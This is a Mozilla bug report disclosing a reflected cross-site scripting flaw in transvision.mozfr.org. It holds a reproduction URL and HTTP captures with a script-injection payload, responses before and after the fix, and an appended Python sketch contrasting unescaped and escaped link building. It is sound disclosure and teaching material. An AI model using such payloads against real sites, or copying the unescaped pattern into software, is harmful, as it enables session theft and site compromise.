Closed Bug 1277512 Opened 8 years ago Closed 8 years ago

XSS on transvision.mozfr.org

Categories

(Websites :: Other, defect)

Production
defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: griffin.francis.1993, Assigned: pascalc)

References

Details

(Keywords: sec-high, wsec-xss)

User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36

Steps to reproduce:

Navigate to the following URL - https://transvision.mozfr.org/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1


Actual results:

There is a cross-site scripting issue present within a Mozilla France subdomain.


Expected results:

Code should be sanitized to protect against malicious input.

CONFIRMED

REQUEST

GET /?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 HTTP/1.1
Host: transvision.mozfr.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2016 14:10:37 GMT
Server: Apache/2.4.10 (Debian)
Transvision-perf: Memory: 20447232 (19.5MB); Time: 0.3413s
Cache-Control: max-age=604800
Expires: Thu, 09 Jun 2016 14:10:37 GMT
Vary: Accept-Encoding
Content-Length: 23159
Connection: close
Content-Type: text/html; charset=UTF-8

...SNIP...

    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&"><script>alert(1)</script>=1&json=true">af</a> or
    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&"><script>alert(1)</script>=1&json=true">af</a>.

...SNIP...

Status: UNCONFIRMED → NEW
Ever confirmed: true

pierros: Including you on this bug because I have you as the community sec PoC.

pascal: Including you because I see you're active on the project and fixed previous XSS issues in this application (RE: https://github.com/mozfr/transvision/issues/676).
Flags: needinfo?(pierros)
Flags: needinfo?(pascalc)
griffin: Thanks as always for your submission. Hope to get someone looking at this soon to fix it.
Assignee: nobody → pascalc
Flags: needinfo?(pascalc)

The fix is now on production.

CONFIRMED PROD FIX

REQUEST

GET /?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 HTTP/1.1
Host: transvision.mozfr.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2016 16:20:47 GMT
Server: Apache/2.4.10 (Debian)
Transvision-perf: Memory: 20447232 (19.5MB); Time: 0.3327s
Cache-Control: max-age=604800
Expires: Thu, 09 Jun 2016 16:20:47 GMT
Vary: Accept-Encoding
Content-Length: 23255
Connection: close
Content-Type: text/html; charset=UTF-8

...SNIP...

    <span>API</span>These results are also available as an API request for
    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&&amp;#34;&amp;#62;&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;=1&json=true">af</a> or
    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&&amp;#34;&amp;#62;&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;=1&json=true">af</a>.
    <br>
    <a href="https://github.com/mozfr/transvision/wiki/JSON-API">Learn more about the Transvision API</a>.

...SNIP...

Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(pierros)
Resolution: --- → FIXED

Thanks Pascal for the quick reply and action!

Griffin: I'm moving the discussion for the new bug over to Bug #1277857. Thanks for the submission!
Group: websites-security
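As an added illustration that is not part of the bug report or of Transvision's own code: the two captured responses above show the same query string reflected into an `href`, first with the injected parameter name written out literally (so the `"` in `"><script>` closes the attribute and the `<script>` element lands in the page), then with that name entity-encoded. The Python below reconstructs the link-building step in both forms. The safe version uses percent-encoding for the URL context followed by HTML attribute escaping, which is a different mechanism from the entity encoding visible in the fixed response, and it checks that the encoded link still round-trips to the original parameters, since an encoding fix that breaks the link is not a fix. `SAMPLE_QUERY` is the bug's reproduction query string embedded as constructed input; the function names and the toy `has_injected_tags` check are assumptions made here, not anything from the project.

```python
"""Reflected XSS via echoed query parameters: vulnerable vs. hardened href."""
from html import escape, unescape
from urllib.parse import parse_qsl, urlencode

# Constructed sample: the query string from the bug's reproduction request.
# The final pair has an attacker-controlled *name* ("><script>alert(1)</script>)
# and the value "1". The application never asked for that parameter; it simply
# echoed every pair it received back into a link.
SAMPLE_QUERY = (
    "whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on"
    "&locale=af&search_type=entities&recherche=555-555-0199@example.com"
    "&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1"
)


def vulnerable_api_link(raw_query: str) -> str:
    """Pre-fix behaviour as seen in the first response (a hypothetical
    reconstruction, not Transvision's code): decoded names and values are
    concatenated back into the href with no encoding for the URL context or
    the HTML attribute context, so a double quote terminates the attribute."""
    params = parse_qsl(raw_query, keep_blank_values=True)
    rebuilt = "&".join(f"{name}={value}" for name, value in params)
    return f'<a href="/?{rebuilt}&json=true">af</a>'


def safe_api_link(raw_query: str) -> str:
    """Encode for each context the data passes through, innermost first:
    1. urlencode() percent-encodes names *and* values for the URL, so
       '"', '<' and '>' can never appear literally in the query string;
    2. html.escape(quote=True) escapes the finished URL for the attribute,
       which turns the '&' separators into '&amp;'."""
    params = parse_qsl(raw_query, keep_blank_values=True)
    params.append(("json", "true"))
    href = escape(urlencode(params), quote=True)
    return f'<a href="/?{href}">af</a>'


def href_params(anchor: str) -> list[tuple[str, str]]:
    """Read the href back the way a browser would (entity-decode the attribute
    value, then split the query) to confirm the link still carries the
    original parameters after encoding."""
    start = anchor.index('href="/?') + len('href="/?')
    end = anchor.index('"', start)
    return parse_qsl(unescape(anchor[start:end]), keep_blank_values=True)


def has_injected_tags(anchor: str) -> bool:
    """Toy check for this one markup shape: a single <a>...</a> element has
    exactly two '<' characters; any extra one is an element that broke out
    of the attribute."""
    return anchor.count("<") > 2


if __name__ == "__main__":
    print(vulnerable_api_link(SAMPLE_QUERY))
    print(safe_api_link(SAMPLE_QUERY))
    print("vulnerable link injects tags:", has_injected_tags(vulnerable_api_link(SAMPLE_QUERY)))
    print("safe link injects tags:", has_injected_tags(safe_api_link(SAMPLE_QUERY)))
    print("safe link round-trips:", href_params(safe_api_link(SAMPLE_QUERY)))
```

The point of `href_params` is the part of the fix that is easy to get wrong: in the vulnerable output the injected name is lost from the link entirely (the browser stops reading the attribute at the first `"`), while in the hardened output the same name survives as an ordinary, harmless parameter value.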